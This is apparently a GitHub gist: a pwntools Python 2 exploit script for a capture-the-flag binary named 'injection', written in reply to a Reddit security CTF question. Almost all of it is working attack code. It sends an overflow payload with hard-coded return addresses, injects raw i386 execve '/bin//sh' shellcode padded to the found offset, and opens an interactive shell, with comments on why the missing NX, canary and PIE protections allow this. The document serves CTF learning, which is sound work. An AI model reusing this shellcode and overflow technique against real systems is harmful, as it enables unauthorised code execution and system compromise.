@Caesurus
Created October 29, 2019 04:16
# in response to https://old.reddit.com/r/securityCTF/comments/dlvk57/getting_the_address_of_the_buffer_on_stack_right/
# binary: https://sis-ctf.security.cs.pub.ro/download?file_key=71c9785434fc975eacb85fa0eda6288070f7ca03331a34ac56070d89264ff2d8&team_key=10ac18d83e9f697367026cebbd8fc6aff7a384018dce39e050d47ced4867b316
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./injection
from pwn import *
# Set up pwntools for the correct architecture
# Load the target binary once; registering it as context.binary lets
# pwntools pick the architecture/bit-width from the ELF header.
exe = ELF('./injection')
context.binary = exe
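def start(argv=None, *a, **kw):
    '''Start the exploit against the target.

    argv: extra command-line arguments appended after the binary path.
          None (the default) means no extra arguments. A fresh list is
          built on every call, so the default is never shared between
          calls the way the previous ``argv=[]`` default was.
    *a, **kw: forwarded unchanged to gdb.debug() / process().

    When the pwntools GDB flag is set (args.GDB) the binary is launched
    under gdb with the module-level ``gdbscript``; otherwise it is run as
    a plain process. Returns the pwntools tube in both cases.
    '''
    # Avoid the mutable-default-argument pitfall and accept any sequence.
    argv = [] if argv is None else list(argv)
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    return process([exe.path] + argv, *a, **kw)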
# Commands fed to gdb when the script is run with GDB=1 (see start()).
# .format(**locals()) is applied to the whole string, so the
# {exe.symbols.main:x} field is substituted even though that gdb line is
# commented out. The active breakpoint is a fixed address, which assumes
# the non-PIE load base (0x8048000) listed in the checksec summary below.
gdbscript = '''
#break *0x{exe.symbols.main:x}
b *0x080484ed
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: No RELRO
# Stack: No canary found
# NX: NX disabled
# PIE: No PIE (0x8048000)
# RWX: Has RWX segments
# Launch the target (under gdb when GDB=1, see start()).
io = start()
# Wait for the program's name prompt before sending the first input.
io.recvuntil("name")
# First input: 32 filler bytes followed by two packed 32-bit values.
# The hard-coded addresses rely on the "No PIE" property in the checksec
# summary above; a PIE build would make them unreliable.
payload = "A"*(32)
payload += p32(0x804a000)
payload += p32(0x80484bf)
io.sendline(payload)
# this is 44 bytes, too big for 36 bytes before ret
#shellcode = asm(shellcraft.sh())
# Raw bytes standing in for the commented-out shellcraft call above.
# NOTE: this is a python2 script (see shebang), so the literal is already
# a byte string; under Python 3 it would be str and sendline() would need
# bytes. Running injected bytes from the stack at all depends on
# "NX disabled" in the checksec summary; an NX-enabled build stops this.
shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
#payload2 = cyclic(100) #found jaaa as the offset when trying to return
# pwn cyclic -l jaaa
payload2 = shellcode
plen = len(payload2)
# pad the rest
# 36 is the offset found with cyclic ('jaaa') above. "No canary found"
# in the checksec summary means nothing between the buffer and the saved
# return address detects this overwrite.
payload2 += 'A'*(36-plen)
payload2 += p32(0x08049fe0)
io.sendline(payload2)
# Hand the session to the user.
io.interactive()